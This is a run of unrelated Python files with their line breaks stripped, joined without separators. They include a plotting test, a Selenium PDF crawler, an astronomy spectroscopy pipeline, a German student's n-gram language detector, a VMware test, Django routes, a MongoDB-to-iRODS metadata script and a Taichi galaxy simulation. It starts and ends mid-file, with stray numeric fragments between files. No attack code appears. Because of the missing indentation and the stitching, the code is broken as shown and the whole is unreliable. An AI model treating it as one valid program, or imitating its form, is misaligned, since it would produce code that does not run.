self.assertEqual(ax.get_ylabel(), 'Cardinality', 'The y-axis label is not correct') def test_barplot_frequency_distributions_returns(self): df = get_df_for_test_barplot_frequency_distributions() ax = plotting.barplot_frequency_distributions( df=df, frequency='frequency_level', cardinality='cardinality_value', source='cardinality_source') self.assertIsInstance(ax, matplotlib.axes.Axes) if __name__ == '__main__': absltest.main() import os from selenium import webdriver from selenium.webdriver.firefox.options import Options from bs4 import BeautifulSoup from urllib import request class Spy: def __init__(self, domain, out_dir): self.domain = domain self.out_dir = out_dir os.makedirs(self.out_dir, exist_ok=True) options = Options() options.headless = True self.driver = webdriver.Firefox(firefox_options=options) def crawl(self, dm=None): if dm is None: dm = self.domain self.driver.get(dm) content = self.driver.page_source soup = BeautifulSoup(content, 'html.parser') list_documents = soup.find_all('a', class_='doc_list_link', href=True) next_page_action = soup.find_all('a', class_='pageAction', href=True)[0] for doc in list_documents: self.download_pdf(doc['href']) self.crawl(next_page_action['href']) def download_pdf(self, link): self.driver.get(link) content = self.driver.page_source soup = BeautifulSoup(content, 'html.parser') pdf_link = soup.find_all('a', class_='doc_detail_file_link', href=True) for li in pdf_link: print('Downloading', li['href']) request.urlretrieve(li['href'], os.path.join(self.out_dir, li['href'].split('/')[-1])) def __del__(self): self.driver.quit() print('DONE') """ Automatically Classify and Reduce a given Data Set """ from astropy.io import fits from collections import defaultdict import os import sys import datetime from pynot import alfosc from pynot.data import io from pynot.data import organizer as do from pynot.calibs import combine_bias_frames, combine_flat_frames, normalize_spectral_flat from pynot.extraction import auto_extract from pynot import extract_gui from pynot.functions import get_options, get_version_number from pynot.wavecal import rectify, WavelengthError from pynot.identify_gui import create_pixtable from pynot.scired import raw_correction, auto_fit_background, correct_cosmics, correct_raw_file from pynot.response import calculate_response, flux_calibrate from PyQt5.QtWidgets import QApplication code_dir = os.path.dirname(os.path.abspath(__file__)) calib_dir = os.path.join(code_dir, 'calib/') defaults_fname = os.path.join(calib_dir, 'default_options.yml') __version__ = get_version_number() class Report(object): def __init__(self, verbose=False): self.verbose = verbose self.time = datetime.datetime.now() self.fname = 'pynot_%s.log' % self.time.strftime('%d%b%Y-%Hh%Mm%S') self.remarks = list() self.lines = list() self.header = """ # PyNOT Data Processing Pipeline # ================================ # version %s %s """ % (__version__, self.time.strftime("%b %d, %Y %H:%M:%S")) self.report = "" if self.verbose: print(self.header) def clear(self): self.lines = list() self.remarks = list() def set_filename(self, fname): self.fname = fname def commit(self, text): if self.verbose: print(text, end='', flush=True) self.lines.append(text) def error(self, text): text = ' [ERROR] - ' + text if self.verbose: print(text) if text[-1] != '\n': text += '\n' self.lines.append(text) def warn(self, text): text = '[WARNING] - ' + text if self.verbose: print(text) if text[-1] != '\n': text += '\n' self.lines.append(text) def write(self, text, prefix=' - '): text = prefix + text if self.verbose: print(text) if text[-1] != '\n': text += '\n' self.lines.append(text) def add_linebreak(self): if self.verbose: print("") self.lines.append("\n") def add_remark(self, text): self.remarks.append(text) def _make_report(self): remark_str = ''.join(self.remarks) lines_str = ''.join(self.lines) self.report = '\n'.join([self.header, remark_str, lines_str]) def print_report(self): self._make_report() print(self.report) def save(self): self._make_report() with open(self.fname, 'w') as output: output.write(self.report) def exit(self): print(" - Pipeline terminated.") print(" Consult the log: %s\n" % self.fname) self.save() def fatal_error(self): print(" !! FATAL ERROR !!") print(" Consult the log: %s\n" % self.fname) self.save() class State(dict): """A collection of variables for the pipeline, such as arc line ID tables etc.""" def __init__(self): dict.__init__(self, {}) self.current = '' def print_current_state(self): print(self.current) def set_current_state(self, state): self.current = state def run_pipeline(options_fname, object_id=None, verbose=False, interactive=False): log = Report(verbose) status = State() global app app = QApplication(sys.argv) # -- Parse Options from YAML options = get_options(defaults_fname) user_options = get_options(options_fname) for section_name, section in user_options.items(): if isinstance(section, dict): options[section_name].update(section) else: options[section_name] = section if object_id is None: pass elif isinstance(object_id, str): object_id = [object_id] elif isinstance(object_id, list): if isinstance(object_id[0], str): pass else: log.error("Wrong input type for `object id`. Must be list of strings") log.error("not list of %r" % type(object_id[0])) log.fatal_error() return else: log.error("Wrong input type for `object id`. Must be string or list of strings") log.error("not %r" % type(object_id)) log.fatal_error() return if interactive: # Set all interactive steps to True options['identify']['interactive'] = True options['identify']['all'] = True options['extract']['interactive'] = True options['response']['interactive'] = True dataset_fname = options['dataset'] if dataset_fname and os.path.exists(dataset_fname): # -- load collection database = io.load_database(dataset_fname) log.write("Loaded file classification database: %s" % dataset_fname) # -- reclassify (takes already identified files into account) else: log.error("Dataset does not exist : %s" % dataset_fname) log.fatal_error() return # -- Organize object files in dataset: if 'SPEC_OBJECT' not in database: log.error("No spectroscopic data found in the dataset!") log.error("Check the classification table... object type 'SPEC_OBJECT' missing") log.fatal_error() return object_filelist = database['SPEC_OBJECT'] object_images = list(map(do.RawImage, object_filelist)) log.add_linebreak() log.write(" - The following objects were found in the dataset:", prefix='') log.write(" OBJECT GRISM SLIT EXPTIME FILENAME", prefix='') for sci_img in object_images: output_variables = (sci_img.object, sci_img.grism, sci_img.slit, sci_img.exptime, os.path.basename(sci_img.filename)) log.write("%20s %9s %11s %5.0f %s" % output_variables, prefix='') log.add_linebreak() # get list of unique grisms in dataset: grism_list = list() for sci_img in object_images: grism_name = alfosc.grism_translate[sci_img.grism] if grism_name not in grism_list: grism_list.append(grism_name) # -- Check arc line files: arc_images = list() # for arc_type in ['ARC_He', 'ARC_HeNe', 'ARC_Ne', 'ARC_ThAr']: for arc_type in ['ARC_HeNe', 'ARC_ThAr']: # For now only HeNe arc lines are accepted! # Implement ThAr and automatic combination of He + Ne if arc_type in database.keys(): arc_images += database[arc_type] if len(arc_images) == 0: log.error("No arc line calibration data found in the dataset!") log.error("Check the classification table... object type 'ARC_HeNe' or 'ARC_ThAr' missing") log.fatal_error() return arc_images_for_grism = defaultdict(list) for arc_img in arc_images: raw_grism = fits.getheader(arc_img)['ALGRNM'] this_grism = alfosc.grism_translate[raw_grism] arc_images_for_grism[this_grism].append(arc_img) for grism_name in grism_list: if len(arc_images_for_grism[grism_name]) == 0: log.error("No arc frames defined for grism: %s" % grism_name) log.fatal_error() return else: log.write("%s has necessary arc files." % grism_name) log.add_linebreak() identify_all = options['identify']['all'] identify_interactive = options['identify']['interactive'] if identify_interactive and identify_all: grisms_to_identify = [] log.write("Identify: interactively reidentify arc lines for all objects") log.add_linebreak() elif identify_interactive and not identify_all: # Make pixeltable for all grisms: grisms_to_identify = grism_list log.write("Identify: interactively identify all grisms in dataset:") log.write(", ".join(grisms_to_identify)) log.add_linebreak() else: # Check if pixeltables exist: grisms_to_identify = [] for grism_name in grism_list: pixtab_fname = os.path.join(calib_dir, '%s_pixeltable.dat' % grism_name) if not os.path.exists(pixtab_fname): log.write("%s : pixel table does not exist. Will identify lines..." % grism_name) grisms_to_identify.append(grism_name) else: log.write("%s : pixel table already exists" % grism_name) status[grism_name+'_pixtab'] = pixtab_fname status[pixtab_fname] = options['identify']['order_wl'] log.add_linebreak() # Identify interactively for grisms that are not defined # add the new pixel tables to the calib cache for future use for grism_name in grisms_to_identify: log.write("Starting interactive definition of pixel table for %s" % grism_name) try: arc_fname = arc_images_for_grism[grism_name][0] if grism_name+'_pixtab' in options: pixtab_fname = options[grism_name+'_pixtab'] else: pixtab_fname = os.path.join(calib_dir, '%s_pixeltable.dat' % grism_name) linelist_fname = '' log.write("Input arc line frame: %s" % arc_fname) poly_order, saved_pixtab_fname, msg = create_pixtable(arc_fname, grism_name, pixtab_fname, linelist_fname, order_wl=options['identify']['order_wl'], app=app) status[saved_pixtab_fname] = poly_order status[grism_name+'_pixtab'] = saved_pixtab_fname log.commit(msg) except: log.error("Identification of arc lines failed!") log.fatal_error() log.save() print("Unexpected error:", sys.exc_info()[0]) raise # Save overview log: print("") print(" - Pipeline setup ended successfully.") print(" Consult the overview log: %s\n\n" % log.fname) log.save() # ------------------------------------------------------------------ # -- Start Main Reduction: if object_id is None: # Loop over all: objects_to_reduce = object_images else: objects_to_reduce = list() for img in object_images: if img.object in object_id: objects_to_reduce.append(img) if len(objects_to_reduce) == 0: log.error("No data matched the given object ID: %r" % object_id) log.fatal_error() return for sci_img in objects_to_reduce: # Create working directory: raw_base = os.path.basename(sci_img.filename).split('.')[0][2:] output_dir = sci_img.target_name + '_' + raw_base if not os.path.exists(output_dir): os.mkdir(output_dir) # Start new log in working directory: log_fname = os.path.join(output_dir, 'pynot.log') log.clear() log.set_filename(log_fname) log.write("Starting PyNOT Longslit Spectroscopic Reduction") log.add_linebreak() log.write("Target Name: %s" % sci_img.target_name) log.write("Input Filename: %s" % sci_img.filename) log.write("Saving output to directory: %s" % output_dir) # Prepare output filenames: grism = alfosc.grism_translate[sci_img.grism] master_bias_fname = os.path.join(output_dir, 'MASTER_BIAS.fits') comb_flat_fname = os.path.join(output_dir, 'FLAT_COMBINED_%s_%s.fits' % (grism, sci_img.slit)) norm_flat_fname = os.path.join(output_dir, 'NORM_FLAT_%s_%s.fits' % (grism, sci_img.slit)) rect2d_fname = os.path.join(output_dir, 'RECT2D_%s.fits' % (sci_img.target_name)) bgsub2d_fname = os.path.join(output_dir, 'BGSUB2D_%s.fits' % (sci_img.target_name)) response_pdf = os.path.join(output_dir, 'RESPONSE_%s.pdf' % (grism)) corrected_2d_fname = os.path.join(output_dir, 'CORRECTED2D_%s.fits' % (sci_img.target_name)) flux2d_fname = os.path.join(output_dir, 'FLUX2D_%s.fits' % (sci_img.target_name)) flux1d_fname = os.path.join(output_dir, 'FLUX1D_%s.fits' % (sci_img.target_name)) extract_pdf_fname = os.path.join(output_dir, 'extract1D_details.pdf') # Combine Bias Frames matched for CCD setup: bias_frames = sci_img.match_files(database['BIAS'], date=False) if options['mbias']: master_bias_fname = options['mbias'] log.write("Using static master bias frame: %s" % options['mbias']) elif len(bias_frames) < 3: log.error("Must have at least 3 bias frames to combine, not %i" % len(bias_frames)) log.error("otherwise provide a static 'master bias' frame!") log.fatal_error() return else: log.write("Running task: Bias Combination") try: _, bias_msg = combine_bias_frames(bias_frames, output=master_bias_fname, kappa=options['bias']['kappa'], method=options['bias']['method'], overwrite=True) log.commit(bias_msg) log.add_linebreak() status['master_bias'] = master_bias_fname except: log.error("Median combination of bias frames failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Combine Flat Frames matched for CCD setup, grism, slit and filter: flat_frames = sci_img.match_files(database['SPEC_FLAT'], date=False, grism=True, slit=True, filter=True) if options['mflat']: if options['mflat'] is None: norm_flat_fname = '' elif options['mflat'].lower() in ['none', 'null']: norm_flat_fname = '' else: norm_flat_fname = options['mflat'] log.write("Using static master flat frame: %s" % options['mflat']) elif len(flat_frames) == 0: log.error("No flat frames provided!") log.fatal_error() return else: try: log.write("Running task: Spectral Flat Combination") _, flat_msg = combine_flat_frames(flat_frames, comb_flat_fname, mbias=master_bias_fname, kappa=options['flat']['kappa'], method=options['flat']['method'], overwrite=True, mode='spec', dispaxis=sci_img.dispaxis) log.commit(flat_msg) log.add_linebreak() status['flat_combined'] = comb_flat_fname except ValueError as err: log.commit(str(err)+'\n') log.fatal_error() return except: log.error("Combination of flat frames failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Normalize the spectral flat field: try: log.write("Running task: Spectral Flat Normalization") _, norm_msg = normalize_spectral_flat(comb_flat_fname, output=norm_flat_fname, fig_dir=output_dir, dispaxis=sci_img.dispaxis, **options['flat']) log.commit(norm_msg) log.add_linebreak() status['master_flat'] = norm_flat_fname except: log.error("Normalization of flat frames failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Identify lines in arc frame: arc_fname, = sci_img.match_files(arc_images, date=False, grism=True, slit=True, filter=True, get_closest_time=True) corrected_arc2d_fname = os.path.join(output_dir, 'corr_arc2d.fits') log.write("Running task: Bias and Flat Field Correction of Arc Frame") try: output_msg = correct_raw_file(arc_fname, bias_fname=master_bias_fname, output=corrected_arc2d_fname, overwrite=True, overscan=50) log.commit(output_msg) log.add_linebreak() except: log.error("Bias and flat field correction of Arc frame failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise if grism+'_pixtab' in options: pixtab_fname = options[grism_name+'_pixtab'] else: pixtab_fname = os.path.join(calib_dir, '%s_pixeltable.dat' % grism) if identify_interactive and identify_all: log.write("Running task: Arc Line Identification") try: linelist_fname = '' order_wl, pixtable, msg = create_pixtable(corrected_arc2d_fname, grism, pixtab_fname, linelist_fname, order_wl=options['identify']['order_wl'], app=app) status[pixtable] = order_wl status[grism+'_pixtab'] = pixtable log.commit(msg) log.add_linebreak() except: log.error("Identification of arc lines failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: # -- or use previous line identifications pixtable = status[grism+'_pixtab'] order_wl = status[pixtable] # Response Function: if 'SPEC_FLUX-STD' in database: flux_std_files = sci_img.match_files(database['SPEC_FLUX-STD'], date=False, grism=True, slit=True, filter=True, get_closest_time=True) else: flux_std_files = [] if len(flux_std_files) == 0: log.warn("No spectroscopic standard star was found in the dataset!") log.warn("The reduced spectra will not be flux calibrated") status['RESPONSE'] = None else: std_fname = flux_std_files[0] # response_fname = os.path.join(output_dir, 'response_%s.fits' % (grism)) response_fname = 'response_%s.fits' % (grism) if os.path.exists(response_fname) and not options['response']['force']: log.write("Response function already exists: %s" % response_fname) log.add_linebreak() status['RESPONSE'] = response_fname else: std_fname = flux_std_files[0] log.write("Running task: Calculation of Response Function") log.write("Spectroscopic Flux Standard: %s" % std_fname) try: response_fname, response_msg = calculate_response(std_fname, arc_fname=corrected_arc2d_fname, pixtable_fname=pixtable, bias_fname=master_bias_fname, flat_fname=norm_flat_fname, output=response_fname, output_dir=output_dir, pdf_fname=response_pdf, order=options['response']['order'], interactive=options['response']['interactive'], dispaxis=sci_img.dispaxis, order_wl=order_wl, order_bg=options['skysub']['order_bg'], rectify_options=options['rectify'], app=app) status['RESPONSE'] = response_fname log.commit(response_msg) log.add_linebreak() except: log.error("Calculation of response function failed!") print("Unexpected error:", sys.exc_info()[0]) status['RESPONSE'] = '' log.warn("No flux calibration will be performed!") log.add_linebreak() # Bias correction, Flat correction log.write("Running task: Bias and Flat Field Correction") try: output_msg = raw_correction(sci_img.data, sci_img.header, master_bias_fname, norm_flat_fname, output=corrected_2d_fname, overwrite=True, overscan=50) log.commit(output_msg) log.add_linebreak() except: log.error("Bias and flat field correction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise # Call rectify log.write("Running task: 2D Rectification and Wavelength Calibration") try: rect_msg = rectify(corrected_2d_fname, corrected_arc2d_fname, pixtable, output=rect2d_fname, fig_dir=output_dir, dispaxis=sci_img.dispaxis, order_wl=order_wl, **options['rectify']) log.commit(rect_msg) log.add_linebreak() except WavelengthError: log.error("2D rectification failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) print("") raise # Automatic Background Subtraction: if options['skysub']['auto']: bgsub_pdf_name = os.path.join(output_dir, 'bgsub2D.pdf') log.write("Running task: Background Subtraction") try: bg_msg = auto_fit_background(rect2d_fname, bgsub2d_fname, dispaxis=1, plot_fname=bgsub_pdf_name, **options['skysub']) log.commit(bg_msg) log.write("2D sky model is saved in extension 'SKY' of the file: %s" % bgsub2d_fname) log.add_linebreak() except: log.error("Automatic background subtraction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: log.warn("No sky-subtraction has been performed on the 2D spectrum!") log.write("Cosmic ray rejection may fail... double check the output or turn off 'crr' by setting niter=0.") log.add_linebreak() bgsub2d_fname = rect2d_fname # Correct Cosmic Rays Hits: if options['crr']['niter'] > 0: log.write("Running task: Cosmic Ray Rejection") crr_fname = os.path.join(output_dir, 'CRR_BGSUB2D_%s.fits' % (sci_img.target_name)) try: crr_msg = correct_cosmics(bgsub2d_fname, crr_fname, **options['crr']) log.commit(crr_msg) log.add_linebreak() except: log.error("Cosmic ray correction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: crr_fname = bgsub2d_fname # Flux Calibration: if status['RESPONSE']: log.write("Running task: Flux Calibration") response_fname = status['RESPONSE'] try: flux_msg = flux_calibrate(crr_fname, output=flux2d_fname, response=response_fname) log.commit(flux_msg) log.add_linebreak() status['FLUX2D'] = flux2d_fname except: log.error("Flux calibration failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: status['FLUX2D'] = crr_fname # Extract 1D spectrum: log.write("Running task: 1D Extraction") extract_fname = status['FLUX2D'] if options['extract']['interactive']: try: log.write("Extraction: Starting Graphical User Interface") extract_gui.run_gui(extract_fname, output_fname=flux1d_fname, app=app, **options['extract']) log.write("Writing fits table: %s" % flux1d_fname, prefix=" [OUTPUT] - ") except: log.error("Interactive 1D extraction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise else: try: ext_msg = auto_extract(extract_fname, flux1d_fname, dispaxis=1, pdf_fname=extract_pdf_fname, **options['extract']) log.commit(ext_msg) log.add_linebreak() except: log.error("Spectral 1D extraction failed!") log.fatal_error() print("Unexpected error:", sys.exc_info()[0]) raise log.exit() langdetector_with_corpus.py0 """ NAME: MATRIKELNUMMER: 108019256229 """ """WAS TUT DAS PROGRAMM? Das Programm liest, tokenisiert und erstellt Ngramme aus dem vom Benutzer eingegebenen Text (Input-Text). Zusätzlich zu diesen Prozessen zählt und sortiert es die ersten 1000 höchsten Ngramme der Korpustexte. Dann vergleicht es die Ngramme des Benutzers mit den sortierten Ngrammen aus dem Korpus und bestimmt die Punktzahl für jede Sprache. Schließlich werden die Sprachen in eine Rangfolge gebracht, und die Sprache mit der höchsten Punktzahl wird als wahrscheinliche Sprache des vom Benutzer angegebenen Textes ausgegeben. """ ################################ # Funktionen ################################ ################################ # Input aus dem Korpus nehmen ################################ def read_text(filename): """Funktion, die einen Dateinamen als Input nimmt und den Inhalt dieser Datei in ein geeignetes Format einliest: Input: filename (str): Dateinamen Return: corpus_tokens (list): Liste von Tokens""" #öffnet, liest und schließt die Datei with open (filename, 'r', encoding="utf-8") as f: source_text = f.read() #ruft die Funktion "wordpunct_tokenize" aus der Bibliothek "nltk" auf from nltk import wordpunct_tokenize #Tokenisierung tokens = wordpunct_tokenize(source_text) #macht die Korpus-Tokens kleiner corpus_tokens = [words.lower() for words in tokens] return corpus_tokens def create_ngrams(corpus_tokens, n): """Funktion, die aus den gegebenen Token saemtliche Ngramme der Laenge n extrahiert und in einer Liste speichert. Input: 1. corpus_tokens (list): Text als Liste von Tokens 2. n (int): Laenge der Ngramme Return: 1. ngrams(list): Liste von Ngrammen""" #definiert eine leere Liste namens ngrams ngrams = [] #für jedes Element in der Liste "corpus_tokens" for tokens in corpus_tokens: #iteriert über die Charaktere im "corpus_tokens", um Ngramme zu erzeugen #z.B.: "deutschland" 0-8(11 - 4 +1) = 8 = ['deut', 'euts', 'utsc', 'tsch', 'schl', 'chla', 'hlan', 'land'] for elt_tokens in range(len(tokens) - n + 1): #fügt alle Ngramme zur Liste "ngrams" hinzu ngrams.append(tokens[elt_tokens:elt_tokens + n]) return ngrams def count_ngrams(ngrams): """Funktion, die die Liste ngrams nimmt, zählt und die Frequenz der einzelnen Ngrammen findet. Input: 1. ngrams (list): Liste von Ngramm Return: 1. freq (dict): Dict von Ngrammen und Frequenzen""" #definiert ein Dictionary namens "freq" freq = {} #für jedes Element in der Liste ngrams for elt_ngrams in ngrams: #wenn die Elemente der Keys des freq-Dictionary mehr als einmal vorkommen if elt_ngrams in freq: #erhöht die Punktzahl von "elt_ngrams" += 1 freq[elt_ngrams] += 1 #wenn nicht, setzt den Wert auf 1 else: freq[elt_ngrams] = 1 return freq def sort_ngrams(freq,count): """Funktion, die das Dictionary Freq nimmt und die Ngramm-Frequenzen reverse sortiert, bis der row-Wert größer ist als der count-Wert, der 1000 beträgt. Input: 1. freq (dict): Dict von Ngrammen und Frequenzen 2. count (int): Der Count-Wert Return: 1. freq_sorted (dict): Dict von sortierten Ngrammen und Frequenzen""" #definiert ein Dictionary namens "freq_sorted" freq_sorted = {} #die Variable "row" auf 0 setzen row = 0 #definiert die Variable "listSorted" und sortiert das Dictionary freq nach ihren "values" und kehrt sie um listSorted = sorted(freq, key=freq.get, reverse=True) #für jedes Element der Liste listSorted for freq_key in listSorted: #erhöht "row " +=1 row += 1 #weist die sortierten Elemente der Liste "listSorted" dem Dictionary "freq_sorted" als Keys zu #und die sortierten "values" des Dictionarys "freq" in das Dictionary "freq_sorted" als "values" freq_sorted[freq_key] = freq[freq_key] #wenn "row " größer als "count" ist if row > count: #bricht die Funktion break return freq_sorted ################################ # Input vom Benutzer nehmen ################################ def take_input_tokenize(n): """Funktion, die den Benutzer nach einem Input-Text fragt, diesen tokenisiert und verkleinert: Input: n (int): Laenge der Ngramme Return: user_ngrams (list): Liste der Benutzer-Ngramme in Kleinbuchstaben""" #fragt den Benutzer nach einem Eingabe-Text (input-text) user_text = input("Bitte geben Sie einen Text:") #ruft die Funktion "wordpunct_tokenize" aus der Bibliothek "nltk" auf from nltk import wordpunct_tokenize #Tokenisierung user_tokens = wordpunct_tokenize(user_text) #macht die Tokens kleiner user_tokens_lowered = [words.lower() for words in user_tokens] #wandelt die User-Tokens entsprechend dem Wert von "n" in Ngramme um user_ngrams = create_ngrams(user_tokens_lowered, n) return user_ngrams def compare_user_with_corpus(user_ngrams, corpus_ngrams): """Funktion, die die Ngramme des Benutzers mit den Ngrammen des Korpus vergleicht und bei Übereinstimmung zwischen diesen beiden Ressourcen jedes Mal den Wert der Punktzahl +=1 der betreffenden Sprache erhöht. Input: 1. user_ngrams (list): Liste der Benutzer-Ngramme 2. corpus_ngrams (dict): Dict von sortierten Korpus_Ngramme und Frequenzen Return: 1. score (int): Die Anzahl der übereinstimmenden Ngramme """ #setzt die Variable "score" auf 0 score = 0 #vergleicht für jedes Element der Liste "user_ngrams" for elt_user in user_ngrams: #mit jedem Element der Liste "corpus_ngrams" for elt_corpus in corpus_ngrams.keys(): #wenn es eine Übereinstimmung zwischen zwei Ressourcen gibt if elt_user == elt_corpus: #erhöht die Punktzahl +=1 score +=1 return score def rank(langscore): """Funktion, die die Sprachen und ihre Punktzahlen im Dictionary "langscore" sortiert. Input: langscore (dict): Dict von Sprachen und ihre Punktzahlen Return: lang_sorted (dict): Dict von sortierten Sprachen und ihre Punktzahlen """ #definiert ein Dictionary namens "lang_sorted" lang_sorted = {} #definiert die Variable "listSorted" entsprechend den Werten von "langscore" und kehrt diese um listSorted = sorted(langscore, key=langscore.get, reverse=True) #für jedes Element in der Liste "listSorted" for sorted_key in listSorted: #weist die sortierten Elemente (sorted_key) der Liste "listSorted" dem Dictionary "lang_sorted" als Keys zu #und die sortierten Werte des Dictionarys "langscore" in das Dictionary "lang_sorted" als Values lang_sorted[sorted_key] = langscore[sorted_key] return lang_sorted def run_script(filename, n): """Funktion, die alle weiteren Funktionen aufruft Input: 1. filename (str): Dateinamen der einzulesenden Textdateien 2. n (int): Laenge der Ngramme Return: -- kein Rueckgabewert, aber Ausgabe der Ergebnisse auf der Konsole (mit prints)""" #macht die User-Tokens zu Ngrammen user_ngrams = take_input_tokenize(n) #definiert ein Dictionary namens "langscore" für jede Sprache und ihre Punktzahl langscores = {} #liest jeden Korpustext jeder Sprache ein, macht sie zu Tokens, Ngrammen for lang in filename.keys(): corpus_tokens = read_text(filename[lang]) ngrams = create_ngrams(corpus_tokens, n) #zählt die Ngramme im Korpus und ermittelt ihre Frequenzen, sortiert die ersten 1000 höchsten Ngramme freq = count_ngrams(ngrams) corpus_ngrams = sort_ngrams(freq, 1000) #vergleicht Ngramme vom User und Ngramme aus den Korpustexten und weist jeder einzelnen Sprache eine Punktzahl im Dictionary "langscores" zu langscores[lang] = compare_user_with_corpus(user_ngrams, corpus_ngrams) #ordnet die Punktzahlen der Sprachen ein ranked_langscores = rank(langscores) #prints die Sprachen und ihre Punktzahlen print(ranked_langscores) #gibt das erste Element des Dictionarys "ranked_langscores" aus print("Nach den Ergebnissen ist die wahrscheinliche Sprache: "+ list(ranked_langscores.keys())[0]) return ################################ # Hauptprogramm ################################ if __name__ == "__main__": #definiert den Wert der Variable "n", die die Länge der Ngramme bestimmt n = 4 #definiert das Dictionary "filename", das aus den Dateipfaden besteht filename = { "Deutsch": "resources\de\corpus-de.txt", "Englisch": "resources\en\corpus-en.txt", "Spanisch": "resources\es\corpus-es.txt", "Niederländisch": "resources\\nl\corpus-nl.txt", "Polnisch": "resources\pl\corpus-pl.txt" } #diese Funktion ruft alle weiteren Funktionen auf run_script(filename, n) # Copyright 2020 VMware, Inc. # SPDX-License-Identifier: MIT import unittest from lib.rest_endpoint.rest_deprecation_handler import RestDeprecationHandler class TestRestDeprecationHandler(unittest.TestCase): sample_package = "vcenter" sample_service = "com.vmware.vcenter" sample_operation = "list" sample_method = "get" sample_path = "/rest/vcenter/vm" replacement_dict = {sample_service: {sample_operation: (sample_method, sample_path)}} rest_deprecation_handler = RestDeprecationHandler(replacement_dict) def test_rest_deprecation(self): path_obj = {"operationId": self.sample_operation, "method": self.sample_method} self.rest_deprecation_handler.add_deprecation_information(path_obj, self.sample_package, self.sample_service) self.assertEqual(path_obj['deprecated'], True) self.assertEqual(path_obj["x-vmw-deprecated"]["replacement"], "api_vcenter.json#/paths/~1rest~1vcenter~1vm/get") if __name__ == '__main__': unittest.main() from django.urls import path from .views import ConfigAttributeEditView app_name = 'configattribute' urlpatterns = [ path('/edit/', ConfigAttributeEditView.as_view(), name='edit'), ] """ Read sample documents from mongo db and write sample metadata files to iRODS. """ import argparse from itertools import islice import json import os import pprint import re import sys import time import pymongo import imicrobe.util.irods as irods def write_sample_metadata_files(target_root, file_limit): """ This script is intended to run on a system with access to the iMicrobe MongoDB. For each document in the 'sample' collection of the 'imicrobe' database write the document contents as a CSV file to iRODS. """ print('target iRODS directory is "{}"'.format(target_root)) with irods.irods_session_manager() as irods_session: if irods.irods_collection_exists(irods_session, target_root): print(' target directory exists') else: print(' target directory does not exist') exit(1) print('\nsearching for samples in Mongo DB') sequence_file_extensions = re.compile('\.(fa|fna|fasta|fastq)(\.tar)?(\.gz)?$') t0 = time.time() samples = {} samples_missing_specimen_file = [] samples_missing_fasta_file = [] for sample_metadata in pymongo.MongoClient().imicrobe.sample.find(limit=file_limit): sample_fn = None #if sample_metadata is None: # print('what is this all about?') # raise Exception() if 'specimen__file' in sample_metadata: specimen_files = sample_metadata['specimen__file'].split() ##print('specimen__file:\n\t"{}"'.format('\n\t'.join(specimen_files))) # find the FASTA file for fp in specimen_files: if not fp.startswith('/iplant/'): # avoid ftp pass elif sequence_file_extensions.search(fp) is None: pass else: sample_dp, sample_fn = os.path.split(fp) metadata_fp = sequence_file_extensions.sub('.json', fp) samples[metadata_fp] = sample_metadata break if sample_fn is None: samples_missing_fasta_file.append(sample_metadata) print('{}: no FASTA file in "{}"'.format( len(samples_missing_fasta_file), pprint.pformat(sample_metadata))) else: pass #print('FASTA file: "{}"'.format(sample_fn)) else: samples_missing_specimen_file.append(sample_metadata) print('{}: no specimen__file in "{}"'.format( len(samples_missing_specimen_file), pprint.pformat(sample_metadata['_id']))) print('found {} samples in {:5.2f}s'.format(len(samples), time.time()-t0)) print(' {} samples have no specimen__file'.format(len(samples_missing_specimen_file))) print(' {} samples have no FASTA file'.format(len(samples_missing_fasta_file))) t0 = time.time() print('which files already exist?') files_to_be_written = {} with irods.irods_session_manager() as irods_session: for metadata_fp, sample_metadata in sorted(samples.items()): print('checking for "{}"'.format(metadata_fp)) if irods.irods_data_object_exists(irods_session, metadata_fp): pass else: files_to_be_written[metadata_fp] = sample_metadata print('found {} files to be written in {:5.2f}s'.format(len(files_to_be_written), time.time()-t0)) t0 = time.time() print('\nwriting {} files'.format(len(files_to_be_written))) with irods.irods_session_manager() as irods_session: for metadata_fp, sample_metadata in sorted(files_to_be_written.items()): print('writing {}'.format(metadata_fp)) # remove mongo _id field - it will not serialize del sample_metadata['_id'] irods.irods_write_data_object( irods_session, metadata_fp, content=json.dumps(sample_metadata, indent=2)) #print(json.dumps(sample_metadata, indent=2)) print('wrote {} metadata files in {:5.3f}s'.format(len(files_to_be_written), time.time()-t0)) def main(argv): arg_parser = argparse.ArgumentParser() arg_parser.add_argument('--target-root', default='/iplant/home/shared/imicrobe/projects') arg_parser.add_argument('--file-limit', type=int, default=0, required=False) args = arg_parser.parse_args(args=argv) write_sample_metadata_files( target_root=args.target_root, file_limit=args.file_limit) def cli(): main(sys.argv[1:]) if __name__ == '__main__': cli() 10-100 import taichi as ti from celestial_objects import Star, Planet if __name__ == "__main__": ti.init(kernel_profiler=True, arch=ti.cuda) # control paused = False export_images = False # stars and planets stars = Star(N=2, mass=1000) stars.initialize(0.5, 0.5, 0.2, 10) planets = Planet(N=1000, mass=1) planets.initialize(0.5, 0.5, 0.4, 10) # GUI my_gui = ti.GUI("Galaxy", (800, 800)) h = 5e-5 # time-step size i = 0 stars.computeForce() planets.computeForce(stars) for celestial_obj in (stars, planets): celestial_obj.update(h) ti.clear_kernel_profile_info() for i in range(100): # while my_gui.running: for e in my_gui.get_events(ti.GUI.PRESS): if e.key == ti.GUI.ESCAPE: exit() elif e.key == ti.GUI.SPACE: paused = not paused print("paused =", paused) elif e.key == 'r': stars.initialize(0.5, 0.5, 0.2, 10) planets.initialize(0.5, 0.5, 0.4, 10) i = 0 elif e.key == 'i': export_images = not export_images if not paused: stars.computeForce() planets.computeForce(stars) for celestial_obj in (stars, planets): celestial_obj.update(h) i += 1 stars.display(my_gui, radius=10, color=0xffd500) planets.display(my_gui) if export_images: my_gui.show(f"images\output_{i:05}.png") else: my_gui.show() ti.print_kernel_profile_info('count')0 """Fixtures for pytest dependency injections""" import redis import pytest @pytest.fixture(scope="function") def redis_db(): """Test that we're using testing redis database, load function 